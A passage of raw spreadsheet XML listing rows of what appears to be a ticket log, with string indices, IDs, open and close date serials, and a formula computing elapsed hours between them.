      <c r="A172" t="s">
        <v>1210</v>
      </c>
      <c r="B172">
        <v>14349</v>
      </c>
      <c r="C172" t="s">
        <v>1211</v>
      </c>
      <c r="D172" t="s">
        <v>7</v>
      </c>
      <c r="E172" s="1">
        <v>43701.092546296299</v>
      </c>
      <c r="F172" s="1">
        <v>43717.01326388889</v>
      </c>
      <c r="G172" t="s">
        <v>333</v>
      </c>
      <c r="H172" t="str">
        <f>TEXT(F172-E172,"[h]")</f>
        <v>382</v>
      </c>
    </row>
    <row r="173" spans="1:8">
      <c r="A173" t="s">
        <v>1212</v>
      </c>
      <c r="B173">
        <v>14345</v>
      </c>
      <c r="C173" t="s">
        <v>1213</v>
      </c>
      <c r="D173" t="s">
        <v>7</v>
      </c>
      <c r="E173" s="1">
        <v>43700.812592592592</v>
      </c>
      <c r="F173" s="1">
        <v>43700.861921296295</v>
      </c>
      <c r="G173" t="s">
        <v>683</v>
      </c>
      <c r="H173" t="str">
        <f>TEXT(F173-E173,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="174" spans="1:8" hidden="1">
      <c r="A174" t="s">
        <v>1214</v>
      </c>
      <c r="B174">
        <v>14342</v>
      </c>
      <c r="C174" t="s">
        <v>1215</v>
      </c>
      <c r="D174" t="s">
        <v>7</v>
      </c>
      <c r="E174" s="1">
        <v>43700.580590277779</v>
      </c>
      <c r="F174" s="1">
        <v>43753.898275462961</v>
      </c>
      <c r="G174" t="s">
        <v>368</v>
      </c>
      <c r="H174" t="str">
        <f>TEXT(F174-E174,"[h]")</f>
        <v>1279</v>
      </c>
    </row>
    <row r="175" spans="1:8">
      <c r="A175" t="s">
        <v>1216</v>
      </c>
      <c r="B175">
        <v>14341</v>
      </c>
      <c r="C175" t="s">
        <v>1217</v>
      </c>
      <c r="D175" t="s">
        <v>7</v>
      </c>
      <c r="E175" s="1">
        <v>43700.546736111108</v>
      </c>
      <c r="F175" s="1">
        <v>43700.598599537036</v>
      </c>
      <c r="G175" t="s">
        <v>123</v>
      </c>
      <c r="H175" t="str">
        <f>TEXT(F175-E175,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="176" spans="1:8">
      <c r="A176" t="s">
        <v>1218</v>
      </c>
      <c r="B176">
        <v>14340</v>
      </c>
      <c r="C176" t="s">
        <v>1219</v>
      </c>
      <c r="D176" t="s">
        <v>7</v>
      </c>
      <c r="E176" s="1">
        <v>43700.3362037037</v>
      </c>
      <c r="F176" s="1">
        <v>43713.722800925927</v>
      </c>
      <c r="G176" t="s">
        <v>1220</v>
      </c>
      <c r="H176" t="str">
        <f>TEXT(F176-E176,"[h]")</f>
        <v>321</v>
      </c>
    </row>
    <row r="177" spans="1:8">
      <c r="A177" t="s">
        <v>1221</v>
      </c>
      <c r="B177">
        <v>14339</v>
      </c>
      <c r="C177" t="s">
        <v>1222</v>
      </c>
      <c r="D177" t="s">
        <v>7</v>
      </c>
      <c r="E177" s="1">
        <v>43700.331423611111</v>
      </c>
      <c r="F177" s="1">
        <v>43700.665393518517</v>
      </c>
      <c r="G177" t="s">
        <v>725</v>
      </c>
      <c r="H177" t="str">
        <f>TEXT(F177-E177,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="178" spans="1:8">
      <c r="A178" t="s">
        <v>1223</v>
      </c>
      <c r="B178">
        <v>14338</v>
      </c>
      <c r="C178" t="s">
        <v>1224</v>
      </c>
      <c r="D178" t="s">
        <v>7</v>
      </c>
      <c r="E178" s="1">
        <v>43700.108819444446</v>
      </c>
      <c r="F178" s="1">
        <v>43700.573564814818</v>
      </c>
      <c r="G178" t="s">
        <v>98</v>
      </c>
      <c r="H178" t="str">
        <f>TEXT(F178-E178,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="179" spans="1:8" hidden="1">
      <c r="A179" t="s">
        <v>1225</v>
      </c>
      <c r="B179">
        <v>14336</v>
      </c>
      <c r="C179" t="s">
        <v>1226</v>
      </c>
      <c r="D179" t="s">
        <v>7</v>
      </c>
      <c r="E179" s="1">
        <v>43699.988125000003</v>
      </c>
      <c r="F179" s="1">
        <v>43730.82885416667</v>
      </c>
      <c r="G179" t="s">
        <v>1227</v>
      </c>
      <c r="H179" t="str">
        <f>TEXT(F179-E179,"[h]")</f>
        <v>740</v>
      </c>
    </row>
    <row r="180" spans="1:8" hidden="1">
      <c r="A180" t="s">
        <v>1228</v>
      </c>
      <c r="B180">
        <v>14335</v>
      </c>
      <c r="C180" t="s">
        <v>1229</v>
      </c>
      <c r="D180" t="s">
        <v>7</v>
      </c>
      <c r="E180" s="1">
        <v>43699.895057870373</v>
      </c>
      <c r="F180" s="1">
        <v>43701.759062500001</v>
      </c>
      <c r="G180" t="s">
        <v>1230</v>
      </c>
      <c r="H180" t="str">
        <f>TEXT(F180-E180,"[h]")</f>
        <v>44</v>
      </c>
    </row>
    <row r="181" spans="1:8">
      <c r="A181" t="s">
        <v>1231</v>
      </c>
      <c r="B181">
        <v>14330</v>
      </c>
      <c r="C181" t="s">
        <v>1232</v>
      </c>
      <c r="D181" t="s">
        <v>7</v>
      </c>
      <c r="E181" s="1">
        <v>43699.743449074071</v>
      </c>
      <c r="F181" s="1">
        <v>43699.993020833332</v>
      </c>
      <c r="G181" t="s">
        <v>1077</v>
      </c>
      <c r="H181" t="str">
        <f>TEXT(F181-E181,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="182" spans="1:8" hidden="1">
      <c r="A182" t="s">
        <v>1233</v>
      </c>
      <c r="B182">
        <v>14328</v>
      </c>
      <c r="C182" t="s">
        <v>1234</v>
      </c>
      <c r="D182" t="s">
        <v>7</v>
      </c>
      <c r="E182" s="1">
        <v>43699.686273148145</v>
      </c>
      <c r="F182" s="1">
        <v>43721.268310185187</v>
      </c>
      <c r="G182" t="s">
        <v>115</v>
      </c>
      <c r="H182" t="str">
        <f>TEXT(F182-E182,"[h]")</f>
        <v>517</v>
      </c>
    </row>
    <row r="183" spans="1:8" hidden="1">
      <c r="A183" t="s">
        <v>1235</v>
      </c>
      <c r="B183">
        <v>14325</v>
      </c>
      <c r="C183" t="s">
        <v>1236</v>
      </c>
      <c r="D183" t="s">
        <v>7</v>
      </c>
      <c r="E183" s="1">
        <v>43699.570520833331</v>
      </c>
      <c r="F183" s="1">
        <v>43699.696018518516</v>
      </c>
      <c r="G183" t="s">
        <v>201</v>
      </c>
      <c r="H183" t="str">
        <f>TEXT(F183-E183,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="184" spans="1:8" hidden="1">
      <c r="A184" t="s">
        <v>1239</v>
      </c>
      <c r="B184">
        <v>14321</v>
      </c>
      <c r="C184" t="s">
        <v>1240</v>
      </c>
      <c r="D184" t="s">
        <v>7</v>
      </c>
      <c r="E184" s="1">
        <v>43698.860162037039</v>
      </c>
      <c r="F184" s="1">
        <v>43698.910509259258</v>
      </c>
      <c r="G184" t="s">
        <v>1241</v>
      </c>
      <c r="H184" t="str">
        <f>TEXT(F184-E184,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="185" spans="1:8" hidden="1">
      <c r="A185" t="s">
        <v>1242</v>
      </c>
      <c r="B185">
        <v>14313</v>
      </c>
      <c r="C185" t="s">
        <v>1243</v>
      </c>
      <c r="D185" t="s">
        <v>7</v>
      </c>
      <c r="E185" s="1">
        <v>43698.083553240744</v>
      </c>
      <c r="F185" s="1">
        <v>43702.883333333331</v>
      </c>
      <c r="G185" t="s">
        <v>66</v>
      </c>
      <c r="H185" t="str">
        <f>TEXT(F185-E185,"[h]")</f>
        <v>115</v>
      </c>
    </row>
    <row r="186" spans="1:8" hidden="1">
      <c r="A186" t="s">
        <v>773</v>
      </c>
      <c r="B186">
        <v>14311</v>
      </c>
      <c r="C186" t="s">
        <v>1244</v>
      </c>
      <c r="D186" t="s">
        <v>7</v>
      </c>
      <c r="E186" s="1">
        <v>43697.979317129626</v>
      </c>
      <c r="F186" s="1">
        <v>43697.989131944443</v>
      </c>
      <c r="G186" t="s">
        <v>66</v>
      </c>
      <c r="H186" t="str">
        <f>TEXT(F186-E186,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="187" spans="1:8">
      <c r="A187" t="s">
        <v>1245</v>
      </c>
      <c r="B187">
        <v>14310</v>
      </c>
      <c r="C187" t="s">
        <v>1246</v>
      </c>
      <c r="D187" t="s">
        <v>7</v>
      </c>
      <c r="E187" s="1">
        <v>43697.870023148149</v>
      </c>
      <c r="F187" s="1">
        <v>43700.809178240743</v>
      </c>
      <c r="G187" t="s">
        <v>31</v>
      </c>
      <c r="H187" t="str">
        <f>TEXT(F187-E187,"[h]")</f>
        <v>70</v>
      </c>
    </row>
    <row r="188" spans="1:8" hidden="1">
      <c r="A188" t="s">
        <v>1250</v>
      </c>
      <c r="B188">
        <v>14303</v>
      </c>
      <c r="C188" t="s">
        <v>1251</v>
      </c>
      <c r="D188" t="s">
        <v>7</v>
      </c>
      <c r="E188" s="1">
        <v>43697.272361111114</v>
      </c>
      <c r="F188" s="1">
        <v>43697.72314814815</v>
      </c>
      <c r="G188" t="s">
        <v>769</v>
      </c>
      <c r="H188" t="str">
        <f>TEXT(F188-E188,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="189" spans="1:8" hidden="1">
      <c r="A189" t="s">
        <v>1247</v>
      </c>
      <c r="B189">
        <v>14298</v>
      </c>
      <c r="C189" t="s">
        <v>1248</v>
      </c>
      <c r="D189" t="s">
        <v>7</v>
      </c>
      <c r="E189" s="1">
        <v>43696.112337962964</v>
      </c>
      <c r="F189" s="1">
        <v>43697.77134259259</v>
      </c>
      <c r="G189" t="s">
        <v>1249</v>
      </c>
      <c r="H189" t="str">
        <f>TEXT(F189-E189,"[h]")</f>
        <v>39</v>
      </c>
    </row>
    <row r="190" spans="1:8" hidden="1">
      <c r="A190" t="s">
        <v>1256</v>
      </c>
      <c r="B190">
        <v>14297</v>
      </c>
      <c r="C190" t="s">
        <v>1257</v>
      </c>
      <c r="D190" t="s">
        <v>7</v>
      </c>
      <c r="E190" s="1">
        <v>43695.730532407404</v>
      </c>
      <c r="F190" s="1">
        <v>43695.859664351854</v>
      </c>
      <c r="G190" t="s">
        <v>1258</v>
      </c>
      <c r="H190" t="str">
        <f>TEXT(F190-E190,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="191" spans="1:8" hidden="1">
      <c r="A191" t="s">
        <v>1259</v>
      </c>
      <c r="B191">
        <v>14296</v>
      </c>
      <c r="C191" t="s">
        <v>1260</v>
      </c>
      <c r="D191" t="s">
        <v>7</v>
      </c>
      <c r="E191" s="1">
        <v>43695.675497685188</v>
      </c>
      <c r="F191" s="1">
        <v>43695.723321759258</v>
      </c>
      <c r="G191" t="s">
        <v>1241</v>
      </c>
      <c r="H191" t="str">
        <f>TEXT(F191-E191,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="192" spans="1:8">
      <c r="A192" t="s">
        <v>1261</v>
      </c>
      <c r="B192">
        <v>14295</v>
      </c>
      <c r="C192" t="s">
        <v>1262</v>
      </c>
      <c r="D192" t="s">
        <v>7</v>
      </c>
      <c r="E192" s="1">
        <v>43695.674050925925</v>
      </c>
      <c r="F192" s="1">
        <v>43697.014502314814</v>
      </c>
      <c r="G192" t="s">
        <v>16</v>
      </c>
      <c r="H192" t="str">
        <f>TEXT(F192-E192,"[h]")</f>
        <v>32</v>
      </c>
    </row>
    <row r="193" spans="1:8" hidden="1">
      <c r="A193" t="s">
        <v>1263</v>
      </c>
      <c r="B193">
        <v>14291</v>
      </c>
      <c r="C193" t="s">
        <v>1264</v>
      </c>
      <c r="D193" t="s">
        <v>7</v>
      </c>
      <c r="E193" s="1">
        <v>43694.996030092596</v>
      </c>
      <c r="F193" s="1">
        <v>43695.632511574076</v>
      </c>
      <c r="G193" t="s">
        <v>95</v>
      </c>
      <c r="H193" t="str">
        <f>TEXT(F193-E193,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="194" spans="1:8">
      <c r="A194" t="s">
        <v>1265</v>
      </c>
      <c r="B194">
        <v>14290</v>
      </c>
      <c r="C194" t="s">
        <v>1266</v>
      </c>
      <c r="D194" t="s">
        <v>7</v>
      </c>
      <c r="E194" s="1">
        <v>43694.136018518519</v>
      </c>
      <c r="F194" s="1">
        <v>43699.642569444448</v>
      </c>
      <c r="G194" t="s">
        <v>1267</v>
      </c>
      <c r="H194" t="str">
        <f>TEXT(F194-E194,"[h]")</f>
        <v>132</v>
      </c>
    </row>
    <row r="195" spans="1:8">
      <c r="A195" t="s">
        <v>1268</v>
      </c>
      <c r="B195">
        <v>14289</v>
      </c>
      <c r="C195" t="s">
        <v>1269</v>
      </c>
      <c r="D195" t="s">
        <v>7</v>
      </c>
      <c r="E195" s="1">
        <v>43693.649733796294</v>
      </c>
      <c r="F195" s="1">
        <v>43697.014502314814</v>
      </c>
      <c r="G195" t="s">
        <v>16</v>
      </c>
      <c r="H195" t="str">
        <f>TEXT(F195-E195,"[h]")</f>
        <v>80</v>
      </c>
    </row>
    <row r="196" spans="1:8" hidden="1">
      <c r="A196" t="s">
        <v>1270</v>
      </c>
      <c r="B196">
        <v>14285</v>
      </c>
      <c r="C196" t="s">
        <v>1271</v>
      </c>
      <c r="D196" t="s">
        <v>7</v>
      </c>
      <c r="E196" s="1">
        <v>43693.180995370371</v>
      </c>
      <c r="F196" s="1">
        <v>43733.785451388889</v>
      </c>
      <c r="G196" t="s">
        <v>1272</v>
      </c>
      <c r="H196" t="str">
        <f>TEXT(F196-E196,"[h]")</f>
        <v>974</v>
      </c>
    </row>
    <row r="197" spans="1:8" hidden="1">
      <c r="A197" t="s">
        <v>1273</v>
      </c>
      <c r="B197">
        <v>14283</v>
      </c>
      <c r="C197" t="s">
        <v>1274</v>
      </c>
      <c r="D197" t="s">
        <v>7</v>
      </c>
      <c r="E197" s="1">
        <v>43693.000092592592</v>
      </c>
      <c r="F197" s="1">
        <v>43696.842013888891</v>
      </c>
      <c r="G197" t="s">
        <v>1159</v>
      </c>
      <c r="H197" t="str">
        <f>TEXT(F197-E197,"[h]")</f>
        <v>92</v>
      </c>
    </row>
    <row r="198" spans="1:8" hidden="1">
      <c r="A198" t="s">
        <v>1275</v>
      </c>
      <c r="B198">
        <v>14282</v>
      </c>
      <c r="C198" t="s">
        <v>1276</v>
      </c>
      <c r="D198" t="s">
        <v>7</v>
      </c>
      <c r="E198" s="1">
        <v>43692.641273148147</v>
      </c>
      <c r="F198" s="1">
        <v>43724.888101851851</v>
      </c>
      <c r="G198" t="s">
        <v>1277</v>
      </c>
      <c r="H198" t="str">
        <f>TEXT(F198-E198,"[h]")</f>
        <v>773</v>
      </c>
    </row>
    <row r="199" spans="1:8">
      <c r="A199" t="s">
        <v>1278</v>
      </c>
      <c r="B199">
        <v>14279</v>
      </c>
      <c r="C199" t="s">
        <v>1279</v>
      </c>
      <c r="D199" t="s">
        <v>7</v>
      </c>
      <c r="E199" s="1">
        <v>43692.404687499999</v>
      </c>
      <c r="F199" s="1">
        <v>43713.998912037037</v>
      </c>
      <c r="G199" t="s">
        <v>1280</v>
      </c>
      <c r="H199" t="str">
        <f>TEXT(F199-E199,"[h]")</f>
        <v>518</v>
      </c>
    </row>
    <row r="200" spans="1:8" hidden="1">
      <c r="A200" t="s">
        <v>1281</v>
      </c>
      <c r="B200">
        <v>14272</v>
      </c>
      <c r="C200" t="s">
        <v>1282</v>
      </c>
      <c r="D200" t="s">
        <v>7</v>
      </c>
      <c r="E200" s="1">
        <v>43691.564791666664</v>
      </c>
      <c r="F200" s="1">
        <v>43691.685034722221</v>
      </c>
      <c r="G200" t="s">
        <v>66</v>
      </c>
      <c r="H200" t="str">
        <f>TEXT(F200-E200,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="201" spans="1:8">
      <c r="A201" t="s">
        <v>1252</v>
      </c>
      <c r="B201">
        <v>14270</v>
      </c>
      <c r="C201" t="s">
        <v>1253</v>
      </c>
      <c r="D201" t="s">
        <v>7</v>
      </c>
      <c r="E201" s="1">
        <v>43690.815000000002</v>
      </c>
      <c r="F201" s="1">
        <v>43692.028379629628</v>
      </c>
      <c r="G201" t="s">
        <v>189</v>
      </c>
      <c r="H201" t="str">
        <f>TEXT(F201-E201,"[h]")</f>
        <v>29</v>
      </c>
    </row>
    <row r="202" spans="1:8">
      <c r="A202" t="s">
        <v>1283</v>
      </c>
      <c r="B202">
        <v>14268</v>
      </c>
      <c r="C202" t="s">
        <v>1284</v>
      </c>
      <c r="D202" t="s">
        <v>7</v>
      </c>
      <c r="E202" s="1">
        <v>43690.753310185188</v>
      </c>
      <c r="F202" s="1">
        <v>43694.643287037034</v>
      </c>
      <c r="G202" t="s">
        <v>189</v>
      </c>
      <c r="H202" t="str">
        <f>TEXT(F202-E202,"[h]")</f>
        <v>93</v>
      </c>
    </row>
    <row r="203" spans="1:8" hidden="1">
      <c r="A203" t="s">
        <v>1285</v>
      </c>
      <c r="B203">
        <v>14266</v>
      </c>
      <c r="C203" t="s">
        <v>1286</v>
      </c>
      <c r="D203" t="s">
        <v>7</v>
      </c>
      <c r="E203" s="1">
        <v>43690.650879629633</v>
      </c>
      <c r="F203" s="1">
        <v>43691.061608796299</v>
      </c>
      <c r="G203" t="s">
        <v>66</v>
      </c>
      <c r="H203" t="str">
        <f>TEXT(F203-E203,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="204" spans="1:8" hidden="1">
      <c r="A204" t="s">
        <v>1287</v>
      </c>
      <c r="B204">
        <v>14259</v>
      </c>
      <c r="C204" t="s">
        <v>1288</v>
      </c>
      <c r="D204" t="s">
        <v>7</v>
      </c>
      <c r="E204" s="1">
        <v>43689.584085648145</v>
      </c>
      <c r="F204" s="1">
        <v>43697.665034722224</v>
      </c>
      <c r="G204" t="s">
        <v>1289</v>
      </c>
      <c r="H204" t="str">
        <f>TEXT(F204-E204,"[h]")</f>
        <v>193</v>
      </c>
    </row>
    <row r="205" spans="1:8" hidden="1">
      <c r="A205" t="s">
        <v>1290</v>
      </c>
      <c r="B205">
        <v>14257</v>
      </c>
      <c r="C205" t="s">
        <v>1291</v>
      </c>
      <c r="D205" t="s">
        <v>7</v>
      </c>
      <c r="E205" s="1">
        <v>43689.45175925926</v>
      </c>
      <c r="F205" s="1">
        <v>43715.712372685186</v>
      </c>
      <c r="G205" t="s">
        <v>998</v>
      </c>
      <c r="H205" t="str">
        <f>TEXT(F205-E205,"[h]")</f>
        <v>630</v>
      </c>
    </row>
    <row r="206" spans="1:8" hidden="1">
      <c r="A206" t="s">
        <v>1287</v>
      </c>
      <c r="B206">
        <v>14256</v>
      </c>
      <c r="C206" t="s">
        <v>1292</v>
      </c>
      <c r="D206" t="s">
        <v>7</v>
      </c>
      <c r="E206" s="1">
        <v>43689.393437500003</v>
      </c>
      <c r="F206" s="1">
        <v>43697.664155092592</v>
      </c>
      <c r="G206" t="s">
        <v>1293</v>
      </c>
      <c r="H206" t="str">
        <f>TEXT(F206-E206,"[h]")</f>
        <v>198</v>
      </c>
    </row>
    <row r="207" spans="1:8">
      <c r="A207" t="s">
        <v>1294</v>
      </c>
      <c r="B207">
        <v>14255</v>
      </c>
      <c r="C207" t="s">
        <v>1295</v>
      </c>
      <c r="D207" t="s">
        <v>7</v>
      </c>
      <c r="E207" s="1">
        <v>43689.193124999998</v>
      </c>
      <c r="F207" s="1">
        <v>43720.974050925928</v>
      </c>
      <c r="G207" t="s">
        <v>31</v>
      </c>
      <c r="H207" t="str">
        <f>TEXT(F207-E207,"[h]")</f>
        <v>762</v>
      </c>
    </row>
    <row r="208" spans="1:8">
      <c r="A208" t="s">
        <v>1296</v>
      </c>
      <c r="B208">
        <v>14253</v>
      </c>
      <c r="C208" t="s">
        <v>1297</v>
      </c>
      <c r="D208" t="s">
        <v>7</v>
      </c>
      <c r="E208" s="1">
        <v>43688.613206018519</v>
      </c>
      <c r="F208" s="1">
        <v>43759.068761574075</v>
      </c>
      <c r="G208" t="s">
        <v>906</v>
      </c>
      <c r="H208" t="str">
        <f>TEXT(F208-E208,"[h]")</f>
        <v>1690</v>
      </c>
    </row>
    <row r="209" spans="1:8">
      <c r="A209" t="s">
        <v>1298</v>
      </c>
      <c r="B209">
        <v>14252</v>
      </c>
      <c r="C209" t="s">
        <v>1299</v>
      </c>
      <c r="D209" t="s">
        <v>7</v>
      </c>
      <c r="E209" s="1">
        <v>43688.579375000001</v>
      </c>
      <c r="F209" s="1">
        <v>43692.023321759261</v>
      </c>
      <c r="G209" t="s">
        <v>31</v>
      </c>
      <c r="H209" t="str">
        <f>TEXT(F209-E209,"[h]")</f>
        <v>82</v>
      </c>
    </row>
    <row r="210" spans="1:8" hidden="1">
      <c r="A210" t="s">
        <v>1300</v>
      </c>
      <c r="B210">
        <v>14250</v>
      </c>
      <c r="C210" t="s">
        <v>1301</v>
      </c>
      <c r="D210" t="s">
        <v>7</v>
      </c>
      <c r="E210" s="1">
        <v>43688.200324074074</v>
      </c>
      <c r="F210" s="1">
        <v>43698.059201388889</v>
      </c>
      <c r="G210" t="s">
        <v>1302</v>
      </c>
      <c r="H210" t="str">
        <f>TEXT(F210-E210,"[h]")</f>
        <v>236</v>
      </c>
    </row>
    <row r="211" spans="1:8" hidden="1">
      <c r="A211" t="s">
        <v>1303</v>
      </c>
      <c r="B211">
        <v>14249</v>
      </c>
      <c r="C211" t="s">
        <v>1304</v>
      </c>
      <c r="D211" t="s">
        <v>7</v>
      </c>
      <c r="E211" s="1">
        <v>43687.996076388888</v>
      </c>
      <c r="F211" s="1">
        <v>43688.150092592594</v>
      </c>
      <c r="G211" t="s">
        <v>1305</v>
      </c>
      <c r="H211" t="str">
        <f>TEXT(F211-E211,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="212" spans="1:8">
      <c r="A212" t="s">
        <v>1307</v>
      </c>
      <c r="B212">
        <v>14244</v>
      </c>
      <c r="C212" t="s">
        <v>1308</v>
      </c>
      <c r="D212" t="s">
        <v>7</v>
      </c>
      <c r="E212" s="1">
        <v>43687.219444444447</v>
      </c>
      <c r="F212" s="1">
        <v>43720.975960648146</v>
      </c>
      <c r="G212" t="s">
        <v>1309</v>
      </c>
      <c r="H212" t="str">
        <f>TEXT(F212-E212,"[h]")</f>
        <v>810</v>
      </c>
    </row>
    <row r="213" spans="1:8" hidden="1">
      <c r="A213" t="s">
        <v>1310</v>
      </c>
      <c r="B213">
        <v>14242</v>
      </c>
      <c r="C213" t="s">
        <v>1311</v>
      </c>
      <c r="D213" t="s">
        <v>7</v>
      </c>
      <c r="E213" s="1">
        <v>43686.591967592591</v>
      </c>
      <c r="F213" s="1">
        <v>43687.518159722225</v>
      </c>
      <c r="G213" t="s">
        <v>118</v>
      </c>
      <c r="H213" t="str">
        <f>TEXT(F213-E213,"[h]")</f>
        <v>22</v>
      </c>
    </row>
    <row r="214" spans="1:8">
      <c r="A214" t="s">
        <v>1312</v>
      </c>
      <c r="B214">
        <v>14241</v>
      </c>
      <c r="C214" t="s">
        <v>1313</v>
      </c>
      <c r="D214" t="s">
        <v>7</v>
      </c>
      <c r="E214" s="1">
        <v>43686.473043981481</v>
      </c>
      <c r="F214" s="1">
        <v>43699.740277777775</v>
      </c>
      <c r="G214" t="s">
        <v>189</v>
      </c>
      <c r="H214" t="str">
        <f>TEXT(F214-E214,"[h]")</f>
        <v>318</v>
      </c>
    </row>
    <row r="215" spans="1:8">
      <c r="A215" t="s">
        <v>1314</v>
      </c>
      <c r="B215">
        <v>14240</v>
      </c>
      <c r="C215" t="s">
        <v>1315</v>
      </c>
      <c r="D215" t="s">
        <v>7</v>
      </c>
      <c r="E215" s="1">
        <v>43686.426203703704</v>
      </c>
      <c r="F215" s="1">
        <v>43699.895185185182</v>
      </c>
      <c r="G215" t="s">
        <v>16</v>
      </c>
      <c r="H215" t="str">
        <f>TEXT(F215-E215,"[h]")</f>
        <v>323</v>
      </c>
    </row>
    <row r="216" spans="1:8" hidden="1">
      <c r="A216" t="s">
        <v>1320</v>
      </c>
      <c r="B216">
        <v>14235</v>
      </c>
      <c r="C216" t="s">
        <v>1321</v>
      </c>
      <c r="D216" t="s">
        <v>7</v>
      </c>
      <c r="E216" s="1">
        <v>43685.736956018518</v>
      </c>
      <c r="F216" s="1">
        <v>43688.782025462962</v>
      </c>
      <c r="G216" t="s">
        <v>66</v>
      </c>
      <c r="H216" t="str">
        <f>TEXT(F216-E216,"[h]")</f>
        <v>73</v>
      </c>
    </row>
    <row r="217" spans="1:8" hidden="1">
      <c r="A217" t="s">
        <v>1322</v>
      </c>
      <c r="B217">
        <v>14234</v>
      </c>
      <c r="C217" t="s">
        <v>1323</v>
      </c>
      <c r="D217" t="s">
        <v>7</v>
      </c>
      <c r="E217" s="1">
        <v>43685.699004629627</v>
      </c>
      <c r="F217" s="1">
        <v>43685.776134259257</v>
      </c>
      <c r="G217" t="s">
        <v>1098</v>
      </c>
      <c r="H217" t="str">
        <f>TEXT(F217-E217,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="218" spans="1:8">
      <c r="A218" t="s">
        <v>1324</v>
      </c>
      <c r="B218">
        <v>14233</v>
      </c>
      <c r="C218" t="s">
        <v>1325</v>
      </c>
      <c r="D218" t="s">
        <v>7</v>
      </c>
      <c r="E218" s="1">
        <v>43685.66138888889</v>
      </c>
      <c r="F218" s="1">
        <v>43686.964328703703</v>
      </c>
      <c r="G218" t="s">
        <v>160</v>
      </c>
      <c r="H218" t="str">
        <f>TEXT(F218-E218,"[h]")</f>
        <v>31</v>
      </c>
    </row>
    <row r="219" spans="1:8" hidden="1">
      <c r="A219" t="s">
        <v>1326</v>
      </c>
      <c r="B219">
        <v>14231</v>
      </c>
      <c r="C219" t="s">
        <v>1327</v>
      </c>
      <c r="D219" t="s">
        <v>7</v>
      </c>
      <c r="E219" s="1">
        <v>43685.533865740741</v>
      </c>
      <c r="F219" s="1">
        <v>43685.614560185182</v>
      </c>
      <c r="G219" t="s">
        <v>66</v>
      </c>
      <c r="H219" t="str">
        <f>TEXT(F219-E219,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="220" spans="1:8">
      <c r="A220" t="s">
        <v>1328</v>
      </c>
      <c r="B220">
        <v>14228</v>
      </c>
      <c r="C220" t="s">
        <v>1329</v>
      </c>
      <c r="D220" t="s">
        <v>7</v>
      </c>
      <c r="E220" s="1">
        <v>43685.352916666663</v>
      </c>
      <c r="F220" s="1">
        <v>43699.895173611112</v>
      </c>
      <c r="G220" t="s">
        <v>1330</v>
      </c>
      <c r="H220" t="str">
        <f>TEXT(F220-E220,"[h]")</f>
        <v>349</v>
      </c>
    </row>
    <row r="221" spans="1:8" hidden="1">
      <c r="A221" t="s">
        <v>1331</v>
      </c>
      <c r="B221">
        <v>14226</v>
      </c>
      <c r="C221" t="s">
        <v>1332</v>
      </c>
      <c r="D221" t="s">
        <v>7</v>
      </c>
      <c r="E221" s="1">
        <v>43685.075104166666</v>
      </c>
      <c r="F221" s="1">
        <v>43685.707673611112</v>
      </c>
      <c r="G221" t="s">
        <v>66</v>
      </c>
      <c r="H221" t="str">
        <f>TEXT(F221-E221,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="222" spans="1:8" hidden="1">
      <c r="A222" t="s">
        <v>1333</v>
      </c>
      <c r="B222">
        <v>14224</v>
      </c>
      <c r="C222" t="s">
        <v>1334</v>
      </c>
      <c r="D222" t="s">
        <v>7</v>
      </c>
      <c r="E222" s="1">
        <v>43684.820416666669</v>
      </c>
      <c r="F222" s="1">
        <v>43692.367256944446</v>
      </c>
      <c r="G222" t="s">
        <v>368</v>
      </c>
      <c r="H222" t="str">
        <f>TEXT(F222-E222,"[h]")</f>
        <v>181</v>
      </c>
    </row>
    <row r="223" spans="1:8" hidden="1">
      <c r="A223" t="s">
        <v>1335</v>
      </c>
      <c r="B223">
        <v>14223</v>
      </c>
      <c r="C223" t="s">
        <v>1336</v>
      </c>
      <c r="D223" t="s">
        <v>7</v>
      </c>
      <c r="E223" s="1">
        <v>43684.797627314816</v>
      </c>
      <c r="F223" s="1">
        <v>43727.258483796293</v>
      </c>
      <c r="G223" t="s">
        <v>1337</v>
      </c>
      <c r="H223" t="str">
        <f>TEXT(F223-E223,"[h]")</f>
        <v>1019</v>
      </c>
    </row>
    <row r="224" spans="1:8" hidden="1">
      <c r="A224" t="s">
        <v>1338</v>
      </c>
      <c r="B224">
        <v>14219</v>
      </c>
      <c r="C224" t="s">
        <v>1339</v>
      </c>
      <c r="D224" t="s">
        <v>7</v>
      </c>
      <c r="E224" s="1">
        <v>43684.574872685182</v>
      </c>
      <c r="F224" s="1">
        <v>43685.465601851851</v>
      </c>
      <c r="G224" t="s">
        <v>75</v>
      </c>
      <c r="H224" t="str">
        <f>TEXT(F224-E224,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="225" spans="1:8">
      <c r="A225" t="s">
        <v>1254</v>
      </c>
      <c r="B225">
        <v>14217</v>
      </c>
      <c r="C225" t="s">
        <v>1255</v>
      </c>
      <c r="D225" t="s">
        <v>7</v>
      </c>
      <c r="E225" s="1">
        <v>43684.482974537037</v>
      </c>
      <c r="F225" s="1">
        <v>43696.755902777775</v>
      </c>
      <c r="G225" t="s">
        <v>483</v>
      </c>
      <c r="H225" t="str">
        <f>TEXT(F225-E225,"[h]")</f>
        <v>294</v>
      </c>
    </row>
    <row r="226" spans="1:8" hidden="1">
      <c r="A226" t="s">
        <v>1237</v>
      </c>
      <c r="B226">
        <v>14216</v>
      </c>
      <c r="C226" t="s">
        <v>1238</v>
      </c>
      <c r="D226" t="s">
        <v>7</v>
      </c>
      <c r="E226" s="1">
        <v>43684.43240740741</v>
      </c>
